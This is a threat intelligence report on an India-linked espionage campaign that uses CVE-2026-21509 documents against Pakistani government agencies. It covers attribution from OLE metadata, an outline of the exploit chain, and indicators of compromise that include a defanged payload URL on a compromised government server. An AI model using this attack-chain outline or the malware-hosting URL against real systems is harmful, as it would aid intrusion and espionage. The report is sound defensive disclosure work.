BreakglassIntelligence
Back to reports

MALDEV01, WarMachine, and a Compromised Pakistani Government Server: CVE-2026-21509 Gets a Second Life in South Asia

An India-linked actor adapts a European-targeted exploit for Pakistani government espionage, leaving their development machine name in every sample

PublishedApril 3, 2026
cve-2026-21509indiapakistanaptespionageopsec-failuresidewinder

CVE-2026-21509 is well-documented. Zscaler's ThreatLabz named the APT28 campaign exploiting it "Operation Neusploit." Trellix published a detailed analysis. CISA added it to the Known Exploited Vulnerabilities catalog. The targets: Central and Eastern European governments, EU institutions, NATO-adjacent organizations.

This is a different campaign. Different actor. Different targets. Same exploit.

An India-linked threat actor is using CVE-2026-21509 weaponized documents to target Pakistani government entities, and they left their development machine name -- MALDEV01 ("Malware Development 01") -- baked into the OLE metadata of every sample they produced.

The Developer Fingerprints

The samples contain unsanitized OLE metadata that reads like a confession:

  • Machine name: MALDEV01
  • Username: WarMachine
  • Author field: MALDE
  • Locale: English-India (0x4009 / deflang19465)

"MALDEV01" is not subtle. It's a machine name that tells you exactly what it's used for. The username "WarMachine" and author abbreviation "MALDE" (likely shortened from "MALDEV") complete the picture: a dedicated malware development workstation operated by someone who didn't think anyone would check the document properties.

The Targets

Two Pakistani government organizations appear in the campaign:

  • Sindh Integrated Emergency & Health Services (SIEHS) -- emergency response coordination for Pakistan's Sindh province
  • Punjab Safe Cities Authority (PSCA) -- urban surveillance and public safety infrastructure for Punjab province

The PSCA targeting is particularly concerning. The payload URL -- hxxps://sbis.psca.gop[.]pk/css/PDF-READER/PDF%20Viewer.application -- is hosted on a compromised Pakistani government server. The attacker gained access to PSCA's web infrastructure and is using it to serve malware to other Pakistani government targets. A compromised .gop.pk domain adds legitimacy to the delivery chain that an attacker-controlled domain cannot match.

The Exploit Chain

The attack follows the same CVE-2017-0199 → CVE-2017-11882 pattern documented in APT28's Operation Neusploit, but adapted for South Asian targeting:

Weaponized DOCX (SIEHS Document.doc / Agenda.doc)
  → CVE-2026-21509: Remote template injection
    → Fetches exploit payload from compromised .gop.pk server
      → CVE-2017-11882: Equation Editor shellcode execution
        → Backdoor deployment

Development artifacts reveal the iterative process: test samples contain the internal IP 192.168.171.236 (a development network address) and a file named tets.LnK -- a typo of "test.LnK" that confirms hasty testing.

Two Actor Clusters

The investigation identified a second cluster of samples exploiting CVE-2026-21509 with Chinese-language metadata:

  • Creator: qb.li
  • Locale: KSO 2052 (Chinese Simplified, Kingsoft WPS Office)

This suggests either shared exploit builder tooling between Indian and Chinese actors, or independent adoption of the same CVE-2026-21509 weaponization technique. The Chinese cluster targets different victims and uses different infrastructure, ruling out a single actor with multiple personas.

Attribution

MEDIUM-HIGH confidence: India-linked APT

The evidence constellation -- English-India locale, Pakistani government targets, compromised .gop.pk infrastructure, SideWinder/Confucius/Patchwork-consistent TTPs -- points to an Indian state-sponsored actor. The specific group cannot be definitively identified from the available samples, but the operational pattern is consistent with:

  • SideWinder (which we documented earlier this week targeting Azerbaijan-Russia diplomats)
  • Confucius (known for targeting Pakistani military and diplomatic entities)
  • Patchwork/Dropping Elephant (documented targeting Pakistani government organizations)

The CVE-2026-21509 adoption is notable because this vulnerability was previously associated exclusively with APT28 targeting European institutions. Its appearance in a South Asian espionage campaign suggests exploit sharing or independent rediscovery -- either way, defenders tracking CVE-2026-21509 exploitation should expand their geographic scope.

Indicators of Compromise

File Indicators

SHA256FilenameDescription
Listed in full reportSIEHS Document.docPrimary weaponized document
Listed in full reportcori.docVariant
Listed in full reportc9.docVariant
Listed in full reportdesign.docxChinese-cluster sample

Network Indicators

  • sbis.psca.gop[.]pk (compromised Pakistani government server)
  • 192.168.171.236 (development network, internal)

Behavioral Indicators

  • OLE metadata: machine name "MALDEV01", user "WarMachine", author "MALDE"
  • English-India locale (0x4009) in document properties
  • CVE-2026-21509 + CVE-2017-11882 exploit chain

Detection

Four YARA rules and four Suricata signatures are available on our GitHub:

Share